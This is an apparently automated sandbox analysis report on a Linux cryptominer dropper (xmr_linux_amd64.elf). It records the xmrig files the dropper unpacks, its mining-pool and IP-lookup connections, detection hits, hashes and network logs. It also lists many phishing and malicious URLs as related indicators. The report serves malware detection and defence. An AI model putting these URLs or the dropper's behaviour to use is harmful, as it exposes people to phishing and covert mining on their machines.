              • Avira URL Cloud: safe
              		unknown
              http://ocsp.accv.esxmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.accv.es00xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ocsp.quovadisoffshore.com0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.cert.fnmt.es/dpcs/0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://policy.camerfirma.com0xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              141.94.96.195
              		pool-fr.supportxmr.comGermany
              		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
              185.199.108.133
              		raw.githubusercontent.comNetherlands
              		54113FASTLYUSfalse
              104.26.13.205
              		api.ipify.orgUnited States
              		13335CLOUDFLARENETUSfalse
              140.82.121.4
              		github.comUnited States
              		36459GITHUBUSfalse

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              141.94.96.195http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
              • pool.supportxmr.com/favicon.ico
              185.199.108.133https://karankv02.github.io/netflix-clone/Get hashmaliciousHTMLPhisherBrowse
                SecuriteInfo.com.Win32.DropperX-gen.26059.13090.exeGet hashmaliciousXWormBrowse
                  SecuriteInfo.com.Application.ProcessHacker.1.13346.5360.exeGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.PossibleThreat.PALLAS.H.1088.12774.exeGet hashmaliciousUnknownBrowse
                      https://ranjitkumarmehta1.github.io/netflix/Get hashmaliciousHTMLPhisherBrowse
                        https://ascendtransportationllc665121.invisionapp.com/freehand/-4bO4Ia3X6Get hashmaliciousHtmlDropperBrowse
                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                            https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                              file.exeGet hashmaliciousLummaCBrowse
                                SecuriteInfo.com.Trojan.Win64.Meterpreter.11595.2675.exeGet hashmaliciousUnknownBrowse
                                  104.26.13.205fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  golang-modules.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                  • api.ipify.org/?format=wef
                                  Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                  • api.ipify.org/
                                  ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                  • api.ipify.org/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  pool-fr.supportxmr.comSecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                  • 141.94.96.71
                                  kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.195
                                  updater.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  FieroHack.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                  • 141.94.96.195
                                  gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  daisy.ubuntu.comSecuriteInfo.com.PUA.Tool.Linux.BtcMine.9999.9761.11740.elfGet hashmaliciousUnknownBrowse
                                  • 162.213.35.24
                                  mips.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 162.213.35.24
                                  kjsusa6.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 162.213.35.25
                                  SecuriteInfo.com.Linux.Siggen.9999.9288.24208.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.25
                                  SecuriteInfo.com.Linux.Siggen.9999.16908.6432.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.25
                                  SecuriteInfo.com.Linux.Siggen.9999.13676.18917.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.24
                                  SecuriteInfo.com.Linux.Siggen.9999.4349.11257.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.24
                                  SecuriteInfo.com.Linux.Siggen.9999.6773.11573.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.25
                                  SecuriteInfo.com.Linux.Siggen.9999.25670.19421.elfGet hashmaliciousMiraiBrowse
                                  • 162.213.35.24
                                  S9atxTUxvb.elfGet hashmaliciousConnectBackBrowse
                                  • 162.213.35.24
                                  github.comhttps://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.DropperX-gen.26059.13090.exeGet hashmaliciousXWormBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.DropperX-gen.26059.13090.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.Application.ProcessHacker.1.13346.5360.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.Application.ProcessHacker.1.13346.5360.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.PossibleThreat.PALLAS.H.1088.12774.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.PossibleThreat.PALLAS.H.1088.12774.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUShttps://embed.domo.com/embed/pages/q7712Get hashmaliciousUnknownBrowse
                                  • 104.21.55.224
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.149
                                  http://cnhelp.meGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousUnknownBrowse
                                  • 104.17.25.14
                                  https://www.google.com/url?q=https%3A%2F%2Foffice.rbnc.xyz%2FWYeNUvph&sa=D&sntz=1&usg=AOvVaw2cYkkKL9hNhlB4wBjUJIvIGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                  • 104.21.44.175
                                  https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  https://ubenuziqwvnbxsldhlsslykrxxvcdkulinktml.s3.us-west-1.amazonaws.com/vretyyddkfkfkfkf.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 188.114.96.3
                                  https://www-documentsfiles-filled.s3.us-west-1.amazonaws.com/refrrence890345/settlements/QUFNa0FEQmxZMlE1TnpnMExUQTROV1l0TkRVM1lTMWlPR0V6TFdNeFlXWmtPVFEyWWpWaFlRQkdBQUFBQUFBbEl1MDJGRFVUUTZZV2hVeEtkUFIwQndEd2c3Q1hKNkVLUXJxSEZKR/indexx.htmlGet hashmaliciousUnknownBrowse
                                  • 104.18.68.40
                                  https://sporadictrain.com/0/0/0/04ebf7f9c501921752b6ba11e7fa51e8/9b-3042209-11487937-198113-14100-/527524137Get hashmaliciousUnknownBrowse
                                  • 1.1.1.1
                                  https://2014bgq1a2xm4j0dagyg3xlv.z13.web.core.windows.net/?&SUBID=crkv5q9kfo0s73au7c60&sou=217b8667beee6c353eae913709720626&cost=US&ip=Texas&city=online%20education-RONArlington0.456Get hashmaliciousTechSupportScamBrowse
                                  • 104.22.44.142
                                  DFNVereinzurFoerderungeinesDeutschenForschungsnetzesehttp://www.inboundlogistics.comGet hashmaliciousUnknownBrowse
                                  • 141.95.98.64
                                  https://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
                                  • 141.95.171.140
                                  http://opm.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                  • 141.95.171.139
                                  https://vsz.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                  • 141.95.171.142
                                  http://bdg.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                  • 141.95.171.141
                                  http://hjc.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                  • 141.95.171.139
                                  bot_library.exeGet hashmaliciousUnknownBrowse
                                  • 141.94.199.35
                                  IB260MBscv.elfGet hashmaliciousUnknownBrowse
                                  • 141.30.104.209
                                  https://www.google.com/url?q=https://www.google.com/url?q%3DdCSMjVnvsqsqaP8pEWWm%26rct%3DSpPq9HncUaCXUtCZusX0%26sa%3Dt%26esrc%3DuZR6jk9A67Rj7RZhLuPE%26source%3D%26cd%3Deh0xIKCKpKh7i4kTt26p%26cad%3DVEVtMkQKVNr1KW4fxShi%26ved%3DNTDACygNXetEDbRT8YiY%26uact%3D%2520%26url%3Damp%252Fzarafetbayankuafor%252Ecom%252F.rr%252F&sGet hashmaliciousUnknownBrowse
                                  • 141.95.98.65
                                  D0F48A0632B6C451791F4257697E861961F06A6F.htmlGet hashmaliciousUnknownBrowse
                                  • 141.95.171.139
                                  GITHUBUShttps://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  https://pancake.swap-web3.xyz/Get hashmaliciousUnknownBrowse
                                  • 140.82.121.5
                                  https://karankv02.github.io/netflix-clone/Get hashmaliciousHTMLPhisherBrowse
                                  • 140.82.113.18
                                  SecuriteInfo.com.Trojan.Siggen29.39642.1614.1457.exeGet hashmaliciousMicroClip, RedLine, XWormBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.DropperX-gen.26059.13090.exeGet hashmaliciousXWormBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.DropperX-gen.26059.13090.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.Application.ProcessHacker.1.13346.5360.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.Application.ProcessHacker.1.13346.5360.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.PossibleThreat.PALLAS.H.1088.12774.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.PossibleThreat.PALLAS.H.1088.12774.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  FASTLYUShttps://embed.domo.com/embed/pages/q7712Get hashmaliciousUnknownBrowse
                                  • 151.101.194.137
                                  https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousUnknownBrowse
                                  • 151.101.192.176
                                  https://securcomau.gurucan.com/66e8e67dd77b5900129b4800Get hashmaliciousHTMLPhisherBrowse
                                  • 151.101.64.176
                                  https://ubenuziqwvnbxsldhlsslykrxxvcdkulinktml.s3.us-west-1.amazonaws.com/vretyyddkfkfkfkf.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 151.101.194.137
                                  http://grifon.info/announce?info_hash=%08%95%AE%D1m%DD%1A%0B%CEo%C0%27%3Af%7B%14sf%3FC&peer_id=-AZ5770-SNhwkI5WcC8E&supportcrypto=1&port=51797&azudp=51797&uploaded=0&downloaded=0&left=243670495&corrupt=0&event=started&numwant=75&no_peer_id=1&compact=1&key=j9C8cT74&azver=3(87.236.16.208)Get hashmaliciousUnknownBrowse
                                  • 151.101.131.8
                                  https://meetmsklogi.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                  • 151.101.129.140
                                  https://metamaskksloggiinn.webflow.io/Get hashmaliciousUnknownBrowse
                                  • 151.101.2.188
                                  https://metamaskewallet-57a2d4.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                  • 151.101.2.188
                                  https://dainuathickiuroi09-cnt.pages.dev/robots.txt/Get hashmaliciousUnknownBrowse
                                  • 151.101.129.229
                                  https://metamasxalogin.webflow.io/Get hashmaliciousUnknownBrowse
                                  • 151.101.2.188

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages

                                  Download File
                                  Process:/tmp/xmrig/xmrig-6.21.3/xmrig
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:W:W
                                  MD5:ECCBC87E4B5CE2FE28308FD9F2A7BAF3
                                  SHA1:77DE68DAECD823BABBB58EDB1C8E14D7106E83BB
                                  SHA-256:4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE
                                  SHA-512:3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276AE26C43B739BC65C4E16B10C3AF6C202AEBB
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:3

                                  /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages

                                  Download File
                                  Process:/tmp/xmrig/xmrig-6.21.3/xmrig
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:MRV:Mz
                                  MD5:537D9B6C927223C796CAC288CCED29DF
                                  SHA1:EA10E810F96FCA6858E37FDA9832ACE147EED87C
                                  SHA-256:0D21AE129A64E1D19E4A94DFCA3A67C777E17374E9D4CA2F74B65647A88119EA
                                  SHA-512:6D4B04576201F789368F251EA231F5D2C0AE4CF17E95851D3AE10A1825724502732289F830E06247465F0284D4E33A9A120F6D730E62483515556DC1FD9CD120
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:1040

                                  /tmp/xmrig/xmrig-6.21.3/SHA256SUMS

                                  Download File
                                  Process:/tmp/xmr_linux_amd64.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):150
                                  Entropy (8bit):4.42633466447499
                                  Encrypted:false
                                  SSDEEP:3:s17eV3g0BFRm9t2idDcQW3mXT/JXSKbPxgImIVdUR3kUAQ6JXFFFdID:s16eeRm9tj2mDF5bPxgImI+39OV8
                                  MD5:4F3BE397A97FE6981754DAEFF1C2B77B
                                  SHA1:251612464045242636103E61DA4A0BC02C8FB99B
                                  SHA-256:1410925F0EC5A63A042402FD06A1037C06530AEFA065AA80A242D82B580C571C
                                  SHA-512:A22C03E97750A3BD02021514FD12475F502934D94F6B7CF44A2D0A3469618864F8E31DF09E84DB5F1F1E1BE277492922528C614A67DC766754CA4F2E003C880A
                                  Malicious:false
                                  Reputation:low
                                  Preview:2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f xmrig.

                                  /tmp/xmrig/xmrig-6.21.3/config.json

                                  Download File
                                  Process:/tmp/xmr_linux_amd64.elf
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):9467
                                  Entropy (8bit):3.927399205611312
                                  Encrypted:false
                                  SSDEEP:192:LSCgCZC4uaCSW2l0tjM5LRPoN4dW2l0tjMVLRPolY:LebM9fF
                                  MD5:5FE9FAA7D380E999208BACBC160F32F0
                                  SHA1:8F1EFA8D39C319592EA54DB317CE8B18B4852984
                                  SHA-256:E5BB9B393C8952FA6E23A91E1DC3A5C8DA102F87D68F45A70180532B7858CAC0
                                  SHA-512:03DF2B3F69FEB800E71101E2C0BF022159605C5B16838D312E7575B95317D4B657A82722D2B473054C46BED650965BF5C5BB0745E39F253F29CC6888E1DF8E36
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /tmp/xmrig/xmrig-6.21.3/config.json, Author: Joe Security
                                  Reputation:low
                                  Preview:{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "cn/0": false,. "cn-lite/0": false. },. "opencl": {. "enabled": false,. "cache": true,. "loader": null,.

                                  /tmp/xmrig/xmrig-6.21.3/xmrig

                                  Download File
                                  Process:/tmp/xmr_linux_amd64.elf
                                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=989c8e3124a392451d99d52d4ffe7c9e75b887f2, stripped
                                  Category:dropped
                                  Size (bytes):8285424
                                  Entropy (8bit):6.439178867876674
                                  Encrypted:false
                                  SSDEEP:98304:do7w7BdASlHaQkZcWukkzX00ME6R1vkWCZv4TgPEwQoUCgSuLWFCQUhF9VxjzFO8:bFlHaL8QoJRCLvlbNwQpEZlpjMYOQW
                                  MD5:7429D24207B100F6C164BF4703B5941E
                                  SHA1:A7FAD4DE1CE0ED2C137C09D4BF9FE7276555F4A0
                                  SHA-256:72AC2877C9E4CD7D70673C0643EB16805977A9B8D55B6B2E5A6491DB565CEE1F
                                  SHA-512:7D9BCB836D154F5F143815749C36DC928036FB718F4242062A70AA921CBFFDD763E167552C79070DF1AD8AE7C02647892BCFAA859E24137C3CD41A7F6F6CAE27
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: Joe Security
                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: unknown
                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: unknown
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 71%
                                  Reputation:low
                                  Preview:.ELF..............>.......@.....@.......ph~.........@.8...@.......................@.......@...............................................@.......@.....J.\.....J.\.......................\.....................1.......1....................... .w..... ...... ......p........D......................p.......p.@.....p.@.....0.......0.................................@.......@.....$.......$....................... .w..... ...... .............. ...............S.td....p.......p.@.....p.@.....0.......0...............Q.td....................................................R.td.... .w..... ...... .......3.......3.................. .......GNU.............................................GNU....1$..E...-O.|.u.......................................................................................................................................................................................................................................................................................................

                                  /tmp/xmrig/xmrig.tar.gz

                                  Download File
                                  Process:/tmp/xmr_linux_amd64.elf
                                  File Type:gzip compressed data, from Unix, original size modulo 2^32 8291840
                                  Category:dropped
                                  Size (bytes):3505638
                                  Entropy (8bit):7.993555494222719
                                  Encrypted:true
                                  SSDEEP:98304:YH2UpN2u4Nfu46bgzZgA9pl5T8YCjtDjb6UWcM:QT2JtVgA9plV8fecM
                                  MD5:06B8367FC7B84A666A561A6915A4501D
                                  SHA1:D06991F03408390059DF8FC387AC7923E4B5FB7A
                                  SHA-256:A0EEFD7A5C0EFD1CAC153A075B4FDEAD443A04F11CC587A09BD5AC09E174F10F
                                  SHA-512:8D507BC49CEBF932B7F248C5AEA83977352E8E88E02CDBB6CC57D040C0E754AB514106156D42A0ADA5D3D4DD549CD6272EC9ACA966127430B51680926F98E204
                                  Malicious:false
                                  Reputation:low
                                  Preview:...........Z.|...Z..eye}y%O.bj.6M.....J!..b.!M.6.&!Ki)..T..^.+..W.r.. h...X..pA..|.L_.^.s.).w..$.|..O.[n._.....,s.../.T.m.....Mz...oS.ju.N..F.U.?.E.dek4.:.N...Lh...od...<^.[...|6.......s..GKM.....r[E.B...k.......i.........h....4....>.u..P.L.[.x.kP...m..n......^du.B].....*.^.X..a*.[.\n.{.a.*../..4..t5...u..n.T..Lf...Qy....h..V..m3{.*..g..e.y..S...qj......9".K3;.N.G.....~..aqV.D..aC.U...4...&#...iA....k*.T.S..#.7.........-I6......R...*S4...6y...e..m-...|n.F.T....\G...UXC..O..z.*N..L.1b.]n..m..F.TY...Z...K..Y..6V.jT.J..d.*m..D....*...p:2T.*.=....j...f..n.Z..D^u.......":..f.&..-.3..[.t.@.....b....e.f...K...PGu.e...0y.*..."5b.........;+T.6...J.x.8....=D.B{.3j(.B.-:g.......Wg..8.....%-...J..8..7.........SAII$.e.i5....Kdv.w..Zi.TF{.v/.Z]&..&R...2....%.P.....aQ.'a...........f.X..*....${|eU...N.$...C.FX...`...*.......n}V..[...T."..+.V4.i.(..L0.aTO...1b{b..E.."..4....NVw.?(u.".DV5.\.V.. ..%(.k...m..:-X.....%......T..q%.`...4X.eN....v&v?u...P..

                                  Static File Info

                                  General

                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                  Entropy (8bit):6.128828371640179
                                  TrID:
                                  • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                  • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                  • Lumena CEL bitmap (63/63) 0.78%
                                  File name:xmr_linux_amd64.elf
                                  File size:9'076'871 bytes
                                  MD5:aff9d4675fdb21bb30e23ab1466b5841
                                  SHA1:bed1388ccca38218fa67ac7670b0e13bf759702e
                                  SHA256:5f3e06f187c4088882133251e9ee6a03e8f11c73354af3bd6fd7c010b46e78f0
                                  SHA512:2ed958de56fa264446d7d85d36c05e693926a6bfeed6d58aeea7aa1d6f595c94b71472c75834c3edc71ffefc4c3fc59a5362e377ee93c651637d77dc20c9ecf0
                                  SSDEEP:98304:6OiwcvRyACNEbruhSGwXUEvNPHbZNcRsR:diNCKbreqv9bZNcRsR
                                  TLSH:78963B57E8E60894C8FDC2B09A768226EA71785D0B3923DB57A0B7301F337F15976B84
                                  File Content Preview:.ELF..............>.......F.....@.......X...........@.8...@.............@.......@.@.....@.@...............................................@.......@.......V.......V.......................W.....................(./.....(./....................................

                                  Static ELF Info

                                  ELF header

                                  Class:ELF64
                                  Data:2's complement, little endian
                                  Version:1 (current)
                                  Machine:Advanced Micro Devices X86-64
                                  Version Number:0x1
                                  Type:EXEC (Executable file)
                                  OS/ABI:UNIX - System V
                                  ABI Version:0
                                  Entry Point Address:0x460fe0
                                  Flags:0x0
                                  ELF Header Size:64
                                  Program Header Offset:64
                                  Program Header Size:56
                                  Number of Program Headers:5
                                  Section Header Offset:344
                                  Section Header Size:64
                                  Number of Section Headers:13
                                  Header String Table Index:12

                                  Sections

                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                  NULL0x00x00x00x00x0000
                                  .textPROGBITS0x4010000x10000x56ebe60x00x6AX0032
                                  .rodataPROGBITS0x9700000x5700000x15dfc80x00x2A0032
                                  .typelinkPROGBITS0xacdfe00x6cdfe00x22e80x00x2A0032
                                  .itablinkPROGBITS0xad02e00x6d02e00x9000x00x2A0032
                                  .gosymtabPROGBITS0xad0be00x6d0be00x00x00x2A001
                                  .gopclntabPROGBITS0xad0be00x6d0be00x1995480x00x2A0032
                                  .go.buildinfoPROGBITS0xc6b0000x86b0000x300x00x3WA0016
                                  .noptrdataPROGBITS0xc6b0400x86b0400x2d7400x00x3WA0032
                                  .dataPROGBITS0xc987800x8987800xf7380x00x3WA0032
                                  .bssNOBITS0xca7ec00x8a7ec00x640b00x00x3WA0032
                                  .noptrbssNOBITS0xd0bf800x90bf800xb9020x00x3WA0032
                                  .shstrtabSTRTAB0x00x8a80000x870x00x0001

                                  Program Segments

                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                  PHDR0x400x4000400x4000400x1180x1181.63780x4R 0x1000
                                  LOAD0x00x4000000x4000000x56fbe60x56fbe66.26190x5R E0x1000.text
                                  LOAD0x5700000x9700000x9700000x2fa1280x2fa1285.25590x4R 0x1000.rodata .typelink .itablink .gosymtab .gopclntab
                                  LOAD0x86b0000xc6b0000xc6b0000x3cec00xac8824.80650x6RW 0x1000.go.buildinfo .noptrdata .data .bss .noptrbss
                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-18T08:17:17.195597+02002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.13400018.8.8.853UDP
                                  2024-09-18T08:17:17.195697+02002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.13580078.8.8.853UDP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 18, 2024 08:16:55.097759962 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.097803116 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.097872972 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.101342916 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.101361990 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.574285030 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.574475050 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.578790903 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.578804016 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.583648920 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:55.583662987 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.585638046 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:55.585688114 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.585808039 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.586174011 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:56.586249113 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.586276054 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:56.586325884 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.590475082 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.631421089 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:56.696036100 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:56.696114063 CEST44359946104.26.13.205192.168.2.13
                                  Sep 18, 2024 08:16:56.696202040 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.700781107 CEST59946443192.168.2.13104.26.13.205
                                  Sep 18, 2024 08:16:56.700802088 CEST44359946104.26.13.205192.168.2.13
